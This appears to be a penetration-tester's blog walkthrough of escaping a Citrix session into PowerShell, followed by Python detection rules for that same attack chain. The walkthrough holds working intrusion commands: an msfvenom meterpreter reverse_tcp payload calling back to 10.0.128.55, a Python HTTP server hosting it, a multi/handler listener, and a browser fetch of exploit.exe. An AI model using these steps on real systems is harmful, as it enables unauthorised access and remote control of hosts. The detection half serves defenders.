Escaping Citrix Environment

Once you’re inside a Citrix Receiver session you will want a command line. Domain admins often block access to cmd.exe but forget about PowerShell.

There are different ways to get what you want:

Does it still work? Yes, it does!

[screenshot]

Then follow the link called “Access Center” and type the following into the URL field: C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe

[screenshot]

Press enter and get your shell:

[screenshot]

Uploading meterpreter

I had to download meterpreter (some say that it’s better to use PowerShell Empire because it can avoid AVs), so I started a simple HTTP server using Python:

python -m http.server 80

To generate the payload, use msfvenom:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.0.128.55 lport=4444 -f exe -o exploit.exe

To find out which architecture the remote host runs (so the payload matches it), check the following environment variable from the PowerShell prompt:

$ENV:PROCESSOR_ARCHITECTURE

Create a handler on the attacker’s machine (in msfconsole; the port must match the lport given to msfvenom):

use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <local ip>
set LPORT 4444
run

Then we start IE to download our payload:

Invoke-Item "C:\Program Files\Internet Explorer\iexplore.exe"

But it only loads the start page and I was not able to change its behaviour (if you know how, I’d like to know, so email me in that case :). So instead of the previous command I could use the following:

Start-Process <URL>

It starts IE and navigates to the URL. We download the payload, and running it gives us a meterpreter shell.

Then we can use the background command to send our shell into the background and run other modules. To get back to the session, use sessions -i <number>.
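From the defender’s side, the chain above leaves a distinctive trail in process-creation telemetry: a PowerShell started by a published application rather than by Explorer or a console, a browser started by PowerShell (the Start-Process <URL> step), and a command line that points at an .exe on a bare IP address. The following is an added example, not code from the original post: a small Python rule set run over constructed Sysmon-style Event ID 1 records. The event fields, the list of expected PowerShell parents and the published-application path are assumptions to tune per environment; the IP and file name reuse the values from the post.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (the fields a Sysmon Event ID 1 carries)."""
    image: str          # full path of the new process
    parent_image: str   # full path of the parent process
    command_line: str
    user: str


@dataclass(frozen=True)
class Finding:
    rule: str
    user: str
    image: str
    detail: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


POWERSHELL = {"powershell.exe", "powershell_ise.exe", "pwsh.exe"}
# Assumption: parents from which an interactive PowerShell is expected on this
# estate. Anything else (a published app, a browser, an Office process) is
# worth a look in a locked-down Citrix environment.
EXPECTED_POWERSHELL_PARENTS = {
    "explorer.exe", "cmd.exe", "powershell.exe", "pwsh.exe",
    "services.exe", "svchost.exe", "wsmprovhost.exe",
}
BROWSERS = {"iexplore.exe", "msedge.exe", "chrome.exe", "firefox.exe"}
# A URL whose host is a bare IPv4 address and whose path ends in .exe
RAW_IP_EXE_URL = re.compile(
    r"https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?/\S*\.exe\b", re.I)


def analyze(events: Iterable[ProcEvent]) -> List[Finding]:
    """Apply the three rules to each event; findings keep event order."""
    findings: List[Finding] = []
    for ev in events:
        image, parent = basename(ev.image), basename(ev.parent_image)
        # Rule 1: PowerShell launched from an unexpected parent.
        if image in POWERSHELL and parent not in EXPECTED_POWERSHELL_PARENTS:
            findings.append(Finding("powershell-unusual-parent", ev.user,
                                    ev.image, f"parent={parent}"))
        # Rule 2: a browser started by PowerShell (Start-Process <URL>).
        if image in BROWSERS and parent in POWERSHELL:
            findings.append(Finding("browser-from-powershell", ev.user,
                                    ev.image, f"parent={parent}"))
        # Rule 3: any command line fetching an executable from a bare IP.
        m = RAW_IP_EXE_URL.search(ev.command_line)
        if m:
            findings.append(Finding("raw-ip-executable-url", ev.user,
                                    ev.image, m.group(0)))
    return findings


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
IE = r"C:\Program Files\Internet Explorer\iexplore.exe"

# Constructed sample events, not telemetry from a real host.
SAMPLE_EVENTS = [
    # Benign: an admin opens PowerShell from Explorer.
    ProcEvent(PS, r"C:\Windows\explorer.exe", "powershell.exe", r"CORP\admin1"),
    # Suspicious: PowerShell spawned by a published application
    # (hypothetical path) via its URL field.
    ProcEvent(PS, r"C:\Program Files\ContosoPortal\Portal.exe", PS, r"CORP\jdoe"),
    # Suspicious: IE launched by PowerShell to fetch an .exe from a bare IP.
    ProcEvent(IE, PS, f'"{IE}" http://10.0.128.55/exploit.exe', r"CORP\jdoe"),
    # Benign: a user opens IE from the Start menu.
    ProcEvent(IE, r"C:\Windows\explorer.exe", f'"{IE}"', r"CORP\jdoe"),
]


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f.rule:28} user={f.user} image={basename(f.image)} {f.detail}")
```

Rule 1 is the one that matters most here: it fires on the very first step of the escape, before any payload has been fetched, and it does not depend on the attacker’s choice of tooling. Rules 2 and 3 are cheap corroboration; a browser started by a shell to pull an executable from an IP literal is rarely legitimate on a Citrix worker.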
